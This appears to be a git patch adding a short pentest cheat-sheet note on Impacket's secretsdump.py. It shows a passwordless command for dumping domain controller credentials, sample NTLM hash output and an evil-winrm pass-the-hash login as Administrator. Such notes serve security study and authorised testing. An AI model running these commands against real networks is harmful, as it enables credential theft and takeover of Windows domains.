From 04cdaf34ca422cf45a9a157ef4bb31d50f40e659 Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Sat, 28 Aug 2021 00:13:16 +0200
Subject: [PATCH] bump

---
 post_exploitation/docs/secretsdump.md | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 post_exploitation/docs/secretsdump.md

diff --git a/post_exploitation/docs/secretsdump.md b/post_exploitation/docs/secretsdump.md
new file mode 100644
index 0000000..11f2038
--- /dev/null
+++ b/post_exploitation/docs/secretsdump.md
@@ -0,0 +1,23 @@
+# Secretsdump
+
+Mimikatz for the network!
+* Part of Impacket
+
+## Usage
+* IP and domain controller name only.
+```sh
+secretsdump.py -just-dc -no-pass <dc-name>\$@<dc-ip>
+```
+
+* Dumped domain credentials are the result. Example:
+```sh
+Administrator:500:aad3b435b51404eeaad3b435b51404ee:3f3ef89114fb063e3d7fc23c20f65568:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2179ebfa86eb0e3cbab2bd58f2c946f5:::
+```
+
+* NTLM hashes of this dump can be used to feed `evil-winrm`. Example from above as Administrator + Hash
+```sh 
+evil-winrm.rb -i 10.10.15.3 -u Administrator -H 3f3ef89114fb063e3d7fc23c20f65568
+```
+